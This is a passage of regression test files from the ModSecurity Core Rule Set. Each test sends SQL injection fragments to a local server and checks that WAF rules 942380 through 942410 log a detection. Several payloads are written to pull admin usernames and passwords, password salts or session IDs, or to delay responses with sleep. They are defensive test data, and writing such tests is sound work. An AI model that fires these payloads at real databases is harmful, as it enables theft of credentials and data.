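            data: "from `information_schema`.tables limit"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-4
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "ORder by"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-5
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "ordeR by"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-6
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "SELECT (CASE"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-7
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-8
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-9
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-10
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-11
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "SELECT CONCAT(0x717a786a71,(SELECT (CASE"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-12
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "SELECT (CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-13
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-14
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "SELECT 'qzxjq'||(SELECT (CASE"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-15
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "execute php"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-16
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-17
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "Execute("
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-18
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-19
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-20
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-21
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-22
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "HAVING+1%3D"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-23
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "execute+elysi"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-24
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-25
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-26
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-27
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-28
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-29
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-30
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-31
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "execute node_"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-32
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "execute scald"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-33
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "execute system"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-34
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "execute user_"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-35
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "execute views"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-36
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "execute patha"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-37
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "execute workb"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-38
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "execute panel"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-39
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=from+information_schema.tables+where+1%3D2+limit"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-40
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            # This body is percent-encoded twice (%2560 decodes to %60), so the
            # case presumably relies on the rule still matching after more
            # than one decoding pass; confirm against the rule's
            # transformations.
            data: "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-41
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-42
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-43
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT"
            version: HTTP/1.0
          output:
            log_contains: id "942380"
  - test_title: 942380-44 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost 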
method: POST port: 80 uri: "/" data: "pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit" version: HTTP/1.0 output: log_contains: id "942380" ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml��������0000664�0000000�0000000�00000000731�14461225151�0027722�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. Peron" description: None enabled: true name: 942390.yaml tests: - test_title: 942390-1 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 uri: "/?var=sdfsd%27or%201%20%3e%201" version: HTTP/1.0 output: log_contains: id "942390" ���������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml��������0000664�0000000�0000000�00000001016�14461225151�0027707�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. 
Peron" description: None enabled: true name: 942400.yaml tests: - test_title: 942400-1 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 # variable name boundary attacks data: "and '5'orig_var_datavarname=whatever" version: HTTP/1.0 output: log_contains: id "942400" ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml��������0000664�0000000�0000000�00000125771�14461225151�0027727�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christoph Hansen" description: None enabled: true name: 942410.yaml tests: - test_title: 942410-1 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "ABS(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-2 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "benchmark(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-3 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: 
localhost method: POST port: 80 uri: "/" data: "BENChmARk(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-4 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "cast(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-5 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "CAST(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-6 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "char(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-7 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "chaR(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-8 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "chr(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-9 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "CHR(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-10 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "COALESCE(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-11 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "Compress (" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-12 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost 
method: POST port: 80 uri: "/" data: "concat (" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-13 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "cOnCaT(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-14 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "concat_ws(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-15 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "convert(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-16 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "cOnVeRt(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-17 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "COS(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-18 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "COUNT(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-19 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "CURRENT_USER(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-20 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "database (" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-21 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: 
localhost method: POST port: 80 uri: "/" data: "date(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-22 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=date%5D%3D%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-23 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=day.+%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-24 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=day%26%27%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-25 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=decode%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-26 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=default%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-27 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=ELT%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-28 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=encode%3D%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-29 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=ExtractValue%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-30 desc: "SQL Injection Attack" 
stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=EXTRACTVALUE%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-31 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=floor%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-32 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=FLOOR+%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-33 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=format%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-34 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=GROUP_CONCAT%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-35 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=hex%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-36 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=hEx%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-37 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=if+%21%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-38 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=if+%28" version: HTTP/1.0 output: log_contains: id 
"942410" - test_title: 942410-39 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=if%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-40 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=if%5C%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-41 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=IFNULL%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-42 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=in+%27%24%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-43 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=IN+%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-44 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=IN%2F%2A%2A%2F%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-45 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=insert%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-46 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=left%27%29%3F%24%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-47 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" 
data: "pay=LEFT%28"
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  # Tests 942410-48 to 942410-115. Each entry sends one HTTP/1.0 POST to
  # 127.0.0.1:80 and expects the log to name rule id "942410", so every
  # payload in this range is a must-detect case; there are no negative
  # (no_log_contains) entries here.
  # In the encoded bodies %28 is "(" and "+" is a space. Any other escape
  # is decoded in a trailing comment on the data line.
  - test_title: 942410-48
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=length%7C%7C%21%21%24%28"  # pay=length||!!$(
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-49
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=length%7C%7C%28"  # pay=length||(
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-50
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=length%3F%28"  # pay=length?(
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-51
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=length%26%26%21%21%21%24%28"  # pay=length&&!!!$(
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-52
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=length%26%26%28"  # pay=length&&(
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-53
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=LENGTH%28"
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-54
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=ln+%28"
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-55
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=ln%29+%28"  # pay=ln) (
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-56
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=load_file%28"
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-57
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=local%28"
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-58
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=log%28"
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-59
    desc: "SQL Injection Attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=log%26%26%28"  # pay=log&&(
            version: HTTP/1.0
          output:
            log_contains: id "942410"
  - test_title: 942410-60
    desc: "SQL Injection Attack"
